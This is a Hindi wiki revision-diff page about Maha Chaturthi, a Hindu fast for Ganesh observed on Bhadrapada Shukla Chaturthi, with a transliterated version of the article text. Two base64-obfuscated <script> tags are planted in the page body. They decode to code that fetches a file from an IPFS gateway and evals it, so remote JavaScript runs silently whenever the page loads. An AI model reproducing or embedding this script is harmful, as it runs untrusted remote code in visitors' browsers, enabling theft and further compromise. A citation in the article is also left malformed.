Difference between revisions of "महा चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*महाचतुर्थी भाद्रशुक्ल की चतुर्थी को होता है।
 
*महाचतुर्थी भाद्रशुक्ल की चतुर्थी को होता है।
 
*अगर यह रविवार या मंगलवार को पड़े तो भी यह व्रत किया जाता है।
 
*अगर यह रविवार या मंगलवार को पड़े तो भी यह व्रत किया जाता है।
 
*इस दिन [[गणेश]] जी की पूजा की जाती है।
 
*इस दिन [[गणेश]] जी की पूजा की जाती है।
*इस से मन की कामनाएँ पूर्ण होती हैं।<ref>स्मृतिकौस्तुभ (210)</ref>  
+
*इस से मन की कामनाएँ पूर्ण होती हैं।<ref>स्मृतिकौस्तुभ (210</ref>  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • mahachaturthi bhadrashukl ki chaturthi ko hota hai.
  • agar yah ravivar ya mangalavar ko p de to bhi yah vrat kiya jata hai.
  • is din ganesh ji ki pooja ki jati hai.
  • is se man ki kamanaean poorn hoti haian.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. smritikaustubh (210

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>